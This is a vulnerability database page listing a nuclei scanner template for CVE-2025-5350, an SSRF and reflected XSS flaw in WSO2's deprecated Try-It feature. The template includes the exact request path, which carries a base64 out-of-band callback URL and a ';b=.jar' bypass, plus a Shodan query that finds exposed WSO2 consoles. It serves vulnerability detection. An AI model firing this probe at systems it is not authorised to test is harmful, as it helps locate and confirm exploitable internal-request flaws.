Lucene search
K

WSO2 - Server Side Request Forgery

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

WSO2 SSRF and reflected script injection in deprecated Try-It lets admins run JS and query services.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-5350
24 Oct 202513:01
circl
CNNVD
WSO2 API Manager 安全漏洞
25 Oct 202500:00
cnnvd
CVE
CVE-2025-5350
24 Oct 202510:08
cve
Cvelist
CVE-2025-5350 SSRF and Reflected XSS Vulnerability in Deprecated Try-It Feature of Multiple WSO2 Products
24 Oct 202510:08
cvelist
EUVD
EUVD-2025-35829
24 Oct 202510:08
euvd
NVD
CVE-2025-5350
24 Oct 202510:15
nvd
Positive Technologies
PT-2025-43609
24 Oct 202500:00
ptsecurity
RedhatCVE
CVE-2025-5350
25 Oct 202510:18
redhatcve
Vulnrichment
CVE-2025-5350 SSRF and Reflected XSS Vulnerability in Deprecated Try-It Feature of Multiple WSO2 Products
24 Oct 202510:08
vulnrichment
id: CVE-2025-5350

info:
  name: WSO2 - Server Side Request Forgery
  author: Sourabh Grover
  severity: medium
  description: |
    WSO2 products contain SSRF and reflected XSS vulnerabilities in the deprecated Try-It feature accessible only to administrative users, caused by improper URL validation and direct content reflection, letting attackers trick admins into executing arbitrary JavaScript and querying internal services.
  impact: |
    Attackers can execute arbitrary JavaScript in admin browsers and perform internal network requests, risking UI manipulation, data exfiltration, and internal service enumeration.
  remediation: |
    Remove or secure the deprecated Try-It feature and validate user-supplied URLs properly; update to the latest product versions with fixes.
  reference:
    - https://crnkovic.dev/wso2-server-side-request-forgery/
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 5.9
    cve-id: CVE-2025-5350
    epss-score: 0.00583
    epss-percentile: 0.4363
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: wso2
    product: api_manager
    shodan-query: http.title:"WSO2 Management Console"
  tags: cve,cve2025,ssrf,wso2,carbon,oast,oob

variables:
  cb_url: "http://{{interactsh-url}}/"
  uri_b64: "{{base64(cb_url)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/carbon/admin/jsp/WSRequestXSSproxy_ajaxprocessor.jsp;b=.jar?uri={{uri_b64}}&pattern=%7E&username=%7E&password=%7E&payload=%7E"

    redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")'
          - 'contains(body, "AxisFault")'
        condition: and
# digest: 4a0a0047304502203fcc62df7dcdca082e6b4a7d93c9db9f66725b959d1343dafdc2b523e7556b1e022100e72b6c3b1e6981a594d94bc5b3ca2437307c48acab5f44b7264ba6851d039870:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Apr 2026 04:31Current
6Medium risk
Vulners AI Score6
CVSS 3.14.8 - 5.9
EPSS0.00583
SSVC
13